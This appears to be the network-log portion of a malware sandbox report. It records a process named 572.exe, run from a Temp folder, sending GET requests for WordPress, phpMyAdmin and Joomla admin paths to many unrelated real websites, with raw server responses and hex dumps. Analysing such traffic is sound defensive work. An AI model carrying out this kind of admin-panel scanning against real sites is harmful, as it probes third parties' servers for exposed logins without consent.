                                                                                                                                                                                                                                                                                                                                                                Host: pt.secure.imvu.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.514210939 CET369INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                location: https://pt.secure.imvu.com
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.514228106 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.448256016 CET177OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: pt.secure.imvu.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.634480953 CET1286INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.17.9
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.4
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: osCsid=005c033de8762365d836e38a023bc42d; expires=Mon, 04 Mar 2024 11:16:06 GMT; Max-Age=2419200; path=/; domain=.imvu.com; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: osCsid=005c033de8762365d836e38a023bc42d; expires=Mon, 04 Mar 2024 11:16:06 GMT; Max-Age=2419200; path=/; domain=.imvu.com; secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                x-imvu-rnd: ar391KuAO98H7mqEEDsFG14oxg
                                                                                                                                                                                                                                                                                                                                                                content-language: pt-br
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 31 32 33 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 3b db 6e db 48 96 ef 06 e6 1f aa 99 ee 96 d4 23 8a d4 c5 b2 24 db 1a c8 97 5c 76 12 27 1b 27 99 1e 64 03 a3 48 16 25 3a 24 8b 61 15 6d b9 3d f9 98 c1 3e 0c 66 81 7d 1a ec cb be fa c7 f6 9c 22 29 91 12 95 d8 dd 4a 63 4d c8 2a d7 e5 dc 6f 55 2c 1f 7c 77 f2 f2 f8 cd 5f 5f 9d 92 99 0c fc f1 c1 77 ba fe de 73 c9 b3 53 32 f8 30 26 f9 cf 01 0e 12 c7 8b 0f 35 5f c6 1a f1 69 38 3d d4 58 a8 bf 3d d7 88 ed 53 21 0e 35 8f 0d b4 31 39 f8 ee 3d 0b 1d cf fd a0 eb 45 60 c3 07 03 1b 6e 00 36 95 19 3c ec 18 57 c3 8a a4 6e c5 6a bd ae 17 61 ec 1c cc 18 75 c6 3b 8a 8a 80 49 0a 4c cb 48 67 9f 12 ef ea 50 fb 59 7f 3b d1 8f 79 10 51 e9 59 3e 03 5a 78 28 59 28 0f b5 67 a7 87 cc 99 42 8f b1 69 ed 71 3a 55 7f 73 13 15 17 4a 36 97 06 92 b8 4f ec 19 8d 05 93 87 6f df 3c d6 07 2b 90 42 1a b0 43 8d 46 91 cf 74 4f 26 21 13 3a fc 51 80 03 7f e9 9e 73 38 6c 0f f7 7a bb 83 5e af 49 b0 87 c6 d3 24 c0 71 a4 44 8c 0c 23 92 2d c1 ec 24 66 2d 2f b8 4a 5a 36 0f 8c 10 29 f8 93 e0 49 6c b3 43 8b 86 21 8b 15 f2 22 e2 29 e7 53 c0 1c f9 f4 a6 1a 2f 00 4a 21 06 dc f2 7c 66 f3 d8 e1 57 74 0d 4e ca 40 3a 47 bf 66 16 02 d3 6d 1a d1 b2 34 6f 98 b8 df 52 21 a9 4c 84 6e d1 18 9a 37 25 18 96 4f ed 8f ba 8c 69 28 fc c4 86 ae ff 87 c4 f8 5e f8 91 c4 cc cf 01 4a 9e d8 33 dd 83 65 1a 11 de 2f 0c cc 7c 77 6f be bb a7 91 59 cc dc 43 0d b5 08 4a 5c d5 20 7c 02 1e 1a d7 9e 9c 05 cc f0 82 a9 e1 d2 2b 84 62 ac 82 d5 15 b8 56 14 4e ef 4d 40 df 9c f7 cd ed 11 a0 c0 3d 88 80 bd ce 7c af b3 3d 02 14 b8 87 11 d0 9f ef f5 b7 48 00 82 7b 10 01 ed 76 6f 0e 9f
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 123f;nH#$\v''dH%:$am=>f}")JcM*oU,|w__wsS20&5_i8=X=S!519=E`n6<Wnjau;ILHgPY;yQY>Zx(Y(gBiq:UsJ6Oo<+BCFtO&!:Qs8lz^I$qD#-$f-/JZ6)IlC!")S/J!|fWtN@:Gfm4oR!Ln7%Oi(^J3e/|woYCJ\ |+bVNM@=|=H{vo
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.634536028 CET1286INData Raw: ed 91 90 01 7c 18 11 1d 73 0e 9f 2d 12 91 02 7c 18 11 3d 20 bc b7 4d 49 a4 00 1f 46 c4 6e 67 0e 9f 2d 12 91 02 7c 18 11 03 90 de 60 9b ea 48 01 56 11 91 22 96 90 b8 a0 1d d0 29 33 d4 a4 5f 89 39 fb d6 bb 9d 79 37 e3 39 e3 49 f5 fc 3e c8 db 43 d0
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: |s-|= MIFng-|`HV")3_9y79I>CWB>a^|[4tb9=y@`wT]YEs_u)2t1IRK-"P%+Xd<|u-V:i8+#.<pD-D}G#}V,-.%FhN`G
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.634555101 CET1286INData Raw: 32 27 5f 78 77 ea ed a0 79 13 b5 0f ae db 74 61 37 5c cf 00 34 9a 92 d7 1f 75 87 93 e1 d1 51 e3 41 db 91 74 7d 33 5f bb 1a fe 37 55 a2 f7 74 aa cd 01 bb 6a da 5a e0 06 6e ef 09 5b a9 e3 7e 08 52 cd 15 5d b3 33 39 de 3b 6d 97 31 5d c3 56 8b 5f 8b
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 2'_xwyta7\4uQAt}3_7UtjZn[~R]39;m1]V_eb?{d:?FwVo?'y<&=G^1b$#F:mgIIbe8T^xQMaiPa@&_uvw:kul5g]#}K`wiCQoh}Mh{89
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.634599924 CET1286INData Raw: 0f d9 ba 28 86 94 11 cb 9b 43 8d 4f 47 b0 a7 a5 7e 79 fa c5 62 ba 91 de 41 3b 40 8e f2 eb 6e b0 0d b8 76 d2 4b 5a 44 ed ae a0 0a 9b ea 91 d4 60 9e e3 5d e5 d3 62 36 d5 97 1b 32 d8 25 60 85 76 a8 69 d9 5d b2 95 99 e9 4e 9b 39 5a 61 e7 84 53 3c 07
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: (COG~ybA;@nvKZD`]b62%`vi]N9ZaS<)ZYdq!/]B~j&\.ItBb4[/bi#|{{jMuQKC/6tB!q=YJs}[NFv(Ha^1khFm(!vmt'!O@V<
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.634615898 CET304INData Raw: be c8 c2 11 fc bd 0d a3 5f 91 8d ba c1 69 4b b4 78 d5 60 7a b8 6d ab 53 18 0d 4c 3b 17 2f f0 75 c9 9f 3d 79 d1 31 f1 9f 3c 1c 57 1b 4f c2 04 0a 88 2d c7 f4 4b 6e 61 a4 3a 45 27 9e 6e 27 e6 96 fc a8 50 e0 09 ea 32 79 03 9b e3 48 98 ed b4 c4 3b 67
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: _iKx`zmSL;/u=y1<WO-Kna:E'n'P2yH;gv0,+o@f-Z+['CWvPFITA&O,b-<?7n<c/v,Jk W),LW_'DdVg__&\s<v;R2VZD}y


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                257192.168.2.65644964.91.249.2080524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.357544899 CET258OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: chainmine.io
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Referer: http://ww1.chainmine.io/administrator/?usid=27&utid=4923801068
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.506167889 CET369INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Location: http://ww12.chainmine.io/administrator/index.php?usid=27&utid=4923801494
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                258192.168.2.65636241.33.126.10080524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.357870102 CET183OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: student.emis.gov.eg
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.613580942 CET146INHTTP/1.0 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Location: https://student.emis.gov.eg/administrator/
                                                                                                                                                                                                                                                                                                                                                                Server: BigIP
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:05.886864901 CET192OUTGET /administrator/index.php HTTP/1.0
                                                                                                                                                                                                                                                                                                                                                                Host: student.emis.gov.eg
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.140635014 CET155INHTTP/1.0 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Location: https://student.emis.gov.eg/administrator/index.php
                                                                                                                                                                                                                                                                                                                                                                Server: BigIP
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                259192.168.2.6565223.163.115.8680524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.361589909 CET178OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: connect.appen.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.463053942 CET578INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Server: CloudFront
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 167
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://connect.appen.com/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                                                X-Cache: Redirect from cloudfront
                                                                                                                                                                                                                                                                                                                                                                Via: 1.1 392ae56b81ecdd89977a6262a9d12eb2.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: ATL58-P9
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: qyfqYvnT6f3OXyJ0eAoYZ5pnSCr2w3UIh4GurYQRmElcy0BhU4lD7w==
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>CloudFront</center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                260192.168.2.656514104.22.43.15880524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.361648083 CET181OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: casinocontroller.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.701539993 CET445INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb7598c8457b-ATL
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 62 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8e 3d 0f 82 40 10 44 fb fb 15 2b bd 2c 18 ca cd 15 f2 11 49 10 89 39 0a 4b 0c 6b 8e 04 39 e4 0e 8d ff de 00 8d ed cc 9b 97 a1 5d 72 89 d5 ad 4a e1 a4 ce 05 54 f5 b1 c8 63 f0 f6 88 79 aa 32 c4 44 25 5b 73 f0 03 c4 b4 f4 a4 20 ed 9e bd 24 cd 4d 2b 05 b9 ce f5 2c a3 20 82 d2 38 c8 cc 3c b4 84 5b 28 08 57 88 ee a6 fd 2e bb 50 fe 31 3a 94 82 46 a9 34 c3 c4 af 99 ad e3 16 ea 6b 01 9f c6 c2 60 1c 3c 16 0e cc 00 4e 77 16 2c 4f 6f 9e 7c c2 71 f1 ae 46 c2 f5 c9 0f 00 00 ff ff e3 02 00 f3 7c 15 3c c4 00 00 00 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: b3L=@D+,I9Kk9]rJTcy2D%[s $M+, 8<[(W.P1:F4k`<Nw,Oo|qF|<
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.701556921 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                261192.168.2.656537104.21.5.2580524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.361727953 CET175OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: opsu.terna.net
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.488421917 CET701INHTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://terna.net
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=1oTphD858jXi4KTeiPDCvj2%2BcVrZmZtukw5QYhtTHAI6wpjHy4IHioPH%2BrDvO620yKZMpjrH7oWP%2FpvNU8w3sawZU8aJA%2FM%2BdPGYHzTWMBnQCFuRI7FGgmouOSOvBSatWA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb759b66674d-ATL
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                262192.168.2.6565273.141.96.5380524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.361757040 CET174OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: money-farm.cc
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.485356092 CET149INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                location: https://money-farm.cc/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                                                transfer-encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                263192.168.2.65636147.246.167.16980524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.361903906 CET192OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: m.sellercenter.lazada.com.my
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.706695080 CET303INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 357
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://m.sellercenter.lazada.com.my/administrator/
                                                                                                                                                                                                                                                                                                                                                                Server: Tuser/Aserver
                                                                                                                                                                                                                                                                                                                                                                EagleEye-TraceId: 21411e1e17071316925297211e8cdf
                                                                                                                                                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.706708908 CET357INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>301 Moved Permanently</title></head><body bgcolor="white"><h1>301 Moved Permanently</h1><p>Th


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                264192.168.2.65646364.190.63.13680524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.362024069 CET230OUTGET /administrator/?sub1=20240205-2214-51bd-9054-4443f76afe9b HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ww16.followerstiktok.xyz
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.602420092 CET88INHTTP/1.1 439
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                content-length: 0
                                                                                                                                                                                                                                                                                                                                                                server: NginX
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.938167095 CET338OUTGET /administrator/index.php?sub1=20240205-2214-52f0-ba33-ad43e9ad61a1 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ww16.followerstiktok.xyz
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Referer: http://ww16.followerstiktok.xyz/administrator/?sub1=20240205-2214-51bd-9054-4443f76afe9b
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.147805929 CET88INHTTP/1.1 439
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:14:53 GMT
                                                                                                                                                                                                                                                                                                                                                                content-length: 0
                                                                                                                                                                                                                                                                                                                                                                server: NginX


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                265192.168.2.65657296.7.224.17880524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.397922039 CET218OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: naukrigulf.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Referer: http://naukrigulf.com/wp-login.php
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.512114048 CET635INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                                                Server: AkamaiGHost
                                                                                                                                                                                                                                                                                                                                                                Mime-Version: 1.0
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 276
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Server-Timing: cdn-cache; desc=HIT
